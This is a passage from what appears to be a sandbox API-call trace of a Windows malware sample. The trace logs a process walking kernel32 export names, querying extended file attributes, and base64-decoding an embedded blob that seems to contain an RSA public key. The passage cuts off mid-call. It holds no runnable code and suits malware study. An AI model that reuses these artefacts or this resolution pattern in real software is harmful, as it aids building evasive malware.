lpString1="BackupSeek") returned="BackupSeek" [0178.466] lstrlenA (lpString="BACKUPSEEK") returned 10 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0178.467] lstrlenA (lpString="BACKUPWRITE") returned 11 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0178.467] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0178.467] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0178.467] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0178.467] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0178.467] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0178.467] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0178.467] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0178.467] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0178.467] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0178.467] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0178.467] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0178.467] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0178.467] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0178.467] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0178.467] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0178.467] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0178.467] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0178.467] lstrcpyA (in: lpString1=0x239db5c, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0178.467] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0178.468] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0178.468] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0178.468] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0178.468] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0178.468] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0178.468] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0178.468] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0178.468] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0178.468] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0178.468] lstrlenA (lpString="BEEP") returned 4 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0178.468] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0178.468] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0178.468] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0178.468] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0178.468] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0178.468] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0178.468] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0178.468] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0178.468] lstrcpyA (in: lpString1=0x239db5c, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0178.469] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0178.469] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0178.469] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0178.469] lstrlenA (lpString="CANCELIO") returned 8 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0178.469] lstrlenA (lpString="CANCELIOEX") returned 10 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0178.469] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0178.469] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0178.469] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0178.469] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0178.469] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0178.469] lstrlenA (lpString="CHECKELEVATION") returned 14 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0178.469] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0178.469] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0178.469] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0178.469] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0178.469] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0178.469] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0178.469] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0178.469] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0178.469] lstrcpyA (in: lpString1=0x239db5c, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0178.470] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0178.470] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0178.470] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0178.470] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0178.470] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0178.470] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0178.470] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0178.470] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0178.470] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0178.470] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0178.470] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0178.470] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0178.470] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0178.470] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0178.470] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0178.470] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0178.470] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0178.470] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0178.470] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0178.470] lstrcpyA (in: lpString1=0x239db5c, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0178.471] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0178.471] lstrcpyA (in: lpString1=0x239db5c, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0178.471] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0178.471] lstrcpyA (in: lpString1=0x239db5c, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0178.471] NtQueryEaFile (in: FileHandle=0x204, IoStatusBlock=0x239e7ec, Buffer=0x6e0000, Length=0x10000, ReturnSingleEntry=0, EaList=0x6c0000, EaListLength=0xf, EaIndex=0x0, RestartScan=1 | out: IoStatusBlock=0x239e7ec, Buffer=0x6e0000) returned 0x0 [0178.477] CryptStringToBinaryA (in: pszString="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", cchString=0xa38, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x239e7bc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x239e7bc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0178.477] VirtualAlloc (lpAddress=0x0, dwSize=0x7a8, flAllocationType=0x3000, flProtect=0x4) returned 0x730000 [0178.477] CryptStringToBinaryA (in: pszString="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", cchString=0xa38, dwFlags=0x1, pbBinary=0x730000, pcbBinary=0x239e7bc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x730000, pcbBinary=0x239e7bc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0178.477] VirtualAlloc (lpAddress=0x0, dwSize=0x114, flAllocationType=0x3000, flProtect=0x4) returned 